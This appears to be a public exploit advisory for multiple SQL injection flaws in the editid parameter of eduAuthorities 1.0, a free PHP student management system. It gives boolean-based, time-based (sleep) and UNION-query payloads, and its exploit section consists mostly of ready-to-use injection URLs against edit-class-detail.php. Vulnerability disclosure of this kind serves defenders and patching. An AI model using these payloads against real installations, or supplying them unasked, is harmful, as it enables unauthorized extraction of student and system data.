## Titles: eduAuthorities-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 07/29/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The editid parameter appears to be vulnerable to SQL injection attacks. The payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each submitted in the editid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Additionally, the payload (select*from(select(sleep(20)))a) was submitted in the editid parameter. The application took 20011 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.The attacker can get all information from the system by using this vulnerability!
STATUS: HIGH- Vulnerability
[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488 OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)# UiVZfrom(select(sleep(3)))a)
Type: UNION query
Title: MySQL UNION query (random number) - 3 columns
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962 UNION ALL SELECT 8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)
---
```
## Reproduce:
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)
## More:
[href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)
## Time spent:
00:37:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>